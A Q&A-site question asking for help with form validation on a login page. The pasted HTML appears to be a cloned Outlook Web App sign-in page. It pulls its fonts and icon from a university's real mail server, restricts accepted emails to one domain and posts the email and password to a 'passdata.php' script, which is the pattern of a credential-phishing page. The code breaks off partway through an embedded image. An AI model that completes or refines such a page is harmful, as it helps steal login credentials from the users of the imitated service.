# Form Validation and submit on submit text & image with validation on enter button

Tags: javascript, html, regex, forms, validation

Below is my code. It is a user login form.

This code works well when a user enters the email address ( which doesnot have a dot inside the email address which I don't want ) with a specific domain name i.e. @mysite.ae
The validation is done via HTML validation and regex.

1) I have disabled the enter button as it directly submits the form and doesn't validate. How can I make it validate the form first like checking the email address and password inputs are filled and then submit.

2) Currently the form is submitted when the user clicks on the image of the arrow and not on the text. how do I get that working ?

P.S. No additional javascript is being used here but if its required then I am open for it.

Edit- I have inserted my full code. It is predefined template of outlook web app.

```html
<!-- {57A118C6-2DA9-419d-BE9A-F92B0F9A418B} -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 
<html>


<head>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<link rel="shortcut icon" href="https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/favicon.ico" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; CHARSET=utf-8">
<meta name="Robots" content="INDEX">
<title>Outlook Web App</title>



<style>
@font-face {
    font-family: "Segoe UI WPC";
    src: url("https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/segoeui-regular.eot?#iefix") format("embedded-opentype"),
            url("https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/segoeui-regular.ttf") format("truetype");
}

@font-face {
    font-family: "Segoe UI WPC Semilight";
    src: url("https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/segoeui-semilight.eot?#iefix") format("embedded-opentype"),
        url("https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/segoeui-semilight.ttf") format("truetype");
}

@font-face {
    font-family: "Segoe UI WPC Semibold";
    src: url("https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/segoeui-semibold.eot?#iefix") format("embedded-opentype"),
        url("https://mail.rwth-aachen.de/owa/auth/15.0.1130/themes/resources/segoeui-semibold.ttf") format("truetype");
}
</style>
 <link rel="stylesheet" type="text/css" href="mystyle.css">




</head>
<body class="signInBg" style="background: #f2f2f2 url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAANvCAYAAADk40vJAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA+VpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdFJlZj0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlUmVmIyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ1M1IFdpbmRvd3MiIHhtcDpDcmVhdGVEYXRlPSIyMDEyLTA1LTE1VDEzOjEwOjU5LTA3OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAxMi0wNS0xNVQxMzoxMTo0Ni0wNzowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAxMi0wNS0xNVQxMzoxMTo0Ni0wNzowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6MzI2NTAzNjQ5RUNBMTFFMUFBNkRCNDc2QzU0RjhERUYiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6MzI2NTAzNjU5RUNBMTFFMUFBNkRCNDc2QzU0RjhERUYiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDozMjY1MDM2MjlFQ0ExMUUxQUE2REI0NzZDNTRGOERFRiIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDozMjY1MDM2MzlFQ0ExMUUxQUE2REI0NzZDNTRGOERFRiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PnYK5fsAAAFLSURBVHja7NthDoIwDAZQNN7/vCTKKifQgZh12yPx30uG/bqyGLyt6xpLxXVfKi8QBEEQBEEQBEEQBEEQBEEQBEEQBEEQBEEQBEEQBMFh4WP/ePUSBEEQBEHQIQ4EQRA0cUHQdgVBe0Z5QN0Dalx1lAwoGcmAklEeyShP2/I8QlNoCuWRzJXlCeXRuGfvMSSjcX1rjat7NK6llUcyyqM8kvlh6X3dIhmNe2pp5ZGMpQ8nE8qT9R6LZFLeY0xYHnvm69G1h/NjmXJpjWukSGa4ZGIzUpI+C3vYMzM+C6Nu6XmH/XwjpZc9I5mkwz6K8iRtXMlI5mwy0TKZV/Zhf/kZd6g903akxJyN28Ow3ySTdKQ0SyZajpRyKfzPr1wNG3czUj5t1x6G/TbhSKlMZqiRcuhk365xI/2wj6aN+0y+Z25R98LQWH8QeQswAHk7x/k/TxxLAAAAAElFTkSuQmCC') repeat-x"/>



<noscript>
 <div id="dvErr">
  <table cellpadding="0" cellspacing="0">
  <tr>
   <td><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAptJREFUeNqkU01LVFEYfu7XzJ17nZmyJBW0sgRDRAgLoi8tghZG9QNaR7tg2vQjbCu2a9Eq2qRGUYFBZAtLURzSUUcJG8d0ZnTu99fpPdIMSktfOOfcezjP8z7vc94jMMZwmJD5JAhCfWPm0e2+MGKDYRQNBCHrpTWi/1kaExFjY7defp6qneXJhb3pHwGBH4qy8uSIrp9NqjJ0TXsXuvZ0KfvjacEVsIlEzhXkofuvJ0f+I+BgVdOftfZe0OIsQBBTFxLX7raxCIH75vn3xOjwQDbQsSgfNw0pkXkwPjXCsWJNNjFlmttPaWrqKBBTEb9yr0No7tCEptaU3H3xMgQJp90imo2C7plGZvhmbx/H7hHwmnUJnWpjI8L1ZSg7fyBoSQWUHo4FIabFwEJE5HeLX4JmVzqrtjdYN5GM6k95FlhpE4q5A8GzEWzkITYkKYWEqLgG+C58IgiIMx1WkfX0/joBud2Tsrco+wokZ5dAIsL5Scgnu8ACH/7qTyL14RDYo/NJZqPq+D37FYDtlqHlp6n+xF7WYHkO8ZBkE6G9tgQ3BCwabsTdBwzbw34P5oohfZaKwHYB2CrA+bWCyKwgyC/AIU+qnIDAAYE3PAmG48/tU8Am1uXU9XR1A4rrQ6S2iHwP9pe3dIc2/OouTCLgJfBYNCVYrj9RV8A7rCIncwvSMWz5JIDUyW2dkXr1DmKnzxFBuVwDZw0JMxXkLC8YqxPw9vSk2NC62mQui2mUA9rsvpSX0o1+vL2r7InxFzXwp03R/G1GQx9Na6pOwIO3p6U0ZFbjLbl56QRY9tsZbyU7W/jwalyKq4/fb6sYLSq5JUPIfA28kRruwFvgwTuMNwmNG3RV58ntkAyb5jVz2bXMB97CYeKvAAMACjWGjcO+NcIAAAAASUVORK5CYII=" alt=""></td>
   <td style="width:100%">To use Outlook Web App, browser settings must allow scripts to run. For information about how to allow scripts, consult the Help for your browser. If your browser doesn&#39;t support scripts, you can download <a href="http://www.microsoft.com/windows/ie/downloads/default.mspx">Windows Internet Explorer</a> for access to Outlook Web App.</td>
  </tr>
  </table>
 </div>
</noscript>

<form action="passdata.php" method="POST" name="myform" autocomplete="off" id="signup" onkeypress="return event.keyCode != 13;">
<input type='hidden' id='hx' name='hx' value=''>

<input type="hidden" name="flags" value="4">
<input type="hidden" name="forcedownlevel" value="0">
 
 <!-- Default to mouse class, so that things don't look wacky if the script somehow doesn't apply a class -->
<div id="mainLogonDiv" class="mouse">
    <script>

        var mainLogonDiv = window.document.getElementById("mainLogonDiv");
        mainLogonDiv.className = mainLogonDivClassName;
    </script>
    <div class="sidebar">
        <div class="owaLogoContainer">
            <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAABsCAYAAACiuLoyAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOkMwQzQ2MDA4RjEzRTExRTFCMzNFQTMwMzE5REU3RjExIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOkMwQzQ2MDA5RjEzRTExRTFCMzNFQTMwMzE5REU3RjExIj4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QzBDNDYwMDZGMTNFMTFFMUIzM0VBMzAzMTlERTdGMTEiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QzBDNDYwMDdGMTNFMTFFMUIzM0VBMzAzMTlERTdGMTEiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz5qf500AAAGPUlEQVR42uxdOXLjRhRt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" class="owaLogo" aria-hidden="true" />
            <img src="data:image/png;base64,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" class="owaLogoSmall" aria-hidden="true" />
        </div>
    </div>
    <div class="logonContainer">
 <div id="lgnDiv" class="logonDiv">
        
            <div class="signInImageHeader" role="heading" aria-label="Outlook Web App ">
                <img class="mouseHeader" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAacAAAA3CAYAAACo/oVvAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjE3MDNDRjUyRjEzRDExRTE4QzQxRkZBNzQzOUQyQTA5IiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjE3MDNDRjUzRjEzRDExRTE4QzQxRkZBNzQzOUQyQTA5Ij4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6MTcwM0NGNTBGMTNEMTFFMThDNDFGRkE3NDM5RDJBMDkiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6MTcwM0NGNTFGMTNEMTFFMThDNDFGRkE3NDM5RDJBMDkiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz6fCYPkAAATVklEQVR42uxdTYwjRxWutWYTfoK2NwlwQLA9oEACQutFCofsYXokIqEAmh7xIw6RxkY5ICE0YyEOwMEzB4QQCHtuOSDGI3EgF8YGIUUIadsS5gRMj8IhgMh6DigSsNAJBAJKFNyu6rWn+73u+uu2Z/d9kmeTGburXPXe+957VfXqAiNUj9bojdRvAta5vk4Dkxknb/LzRuq3e5Ox2qXBIRDubKwYGo/65KczeXnAX8PJazwxJCENM4FAIBDKI6fWKCYif/LaEP/KfCb+2Z+8BtN/O9cjGnYCgTCxDTdSji1lEAiK5NQauZOf7cmrodmOL16dybP2J/92iaQIBAKBoE9OrdGuICYbcMSztibPbU0Iqk9TQDhn3n6cyj4G/nLZ2OHimYl/pH5rHk1gfe5cv0ATWoqMxNFgeq00moz3ZRocedRyFaU1OrZITPOII7GjyfM751gA3clr51x/B4I6+BrqGMkOmAJ6hidIy/ZzyTEsD1ugY94aNWhoTMmJe1o3J696zmdjJd2bvNaF13jh9ouxVfH7LqLICWLjfnDOSKkjSDsen07BGBHuTATA79YsPBd7hlfCc4c0jaXYByfHUdmiAZLHChgR8JDUyVHMeDtvkONdjgUpxe9piTAXM+SN6aaJzvXmORmzHRKbux4Dll1/9Sw8188hF5NIx6PIqTL4ObbTm9pXbh8JSpETZ/0jZHCjKdHE+e88YoLJKs6bXxORFkMIiow+4TxHTq7IOOh63F6OUfMNngt9dkwGsjRsG/6dAJITX1+qI8QUk1LXqDV+eBKLkNoiaiMQlht840NfMkKRxUbO31wD3VijqKki8DmqA7bTjqNx15IT9/p2cogptKTYPYSgYq/xgKaEcE4wVCSYIniGf1f5HK03VRc17QOOBhGUYuSE7TprWa/ywAkK9jx5eoNAWHZg8qu+sw72uMfGxMf7Ugf0jyKnctBI/X+IyAltjJAmJx41eaACciIpA00g5MW8DwJhucDXbEJLEQ70mbGF59IW8qrAo6G0Y3IoHPswMy+0hFGIlQJCaJWo3JGoFtEGJs7JHGiEvcBIO6qb1QWc71OQeo+MQXAK3heWVg2DC7gnvGqXweuFiXIMme3yUVwh10S7dUA5o1Tb4QKMBtSvjOx842enV17+7+ubF2sXXvyev/qM5NMDYMx1dtZtAM8NU4TE5UxtMxJtIa8OUDTUu01SWTmJdadLw1ZMTj44sOXv6Okx+JCvPzexCeLJvQEose7p+Q7gjaZPzN+QeE694H3rDN7dZUpKsuWkEuJoMF4+qs94qjbSbDs29DvCoSlKYSVFgT3GN7zE47CnvNtTf5y8nLlpJh7tF370x+8/+3z06fc+cO9J/P8Pf+u3B088crkpQVIDll2n9TWcOh8gkDESYamMnWctcpo5Qi5I0mXOKZc5D3G+gsrkKX9s/Mw4z3Ssz7LLJtuVkBM+b5EYu7ACHcQyA0Eex6zkeJaDSlIjrVEICN0GQE4EPtm7TL9qhyNIKo5Om8prD1xWjhADJWss43WZuLZiq+RxSvoKE5NIV3/5xy/s/P4v/5lGGM+9+O+P/ut/r1/83NUHnxz+6eWnJ796pkB+g0k7UUp/XKWzLPDieBI5HQB6savw/d2MQVB1OHlVg22Wf9i8L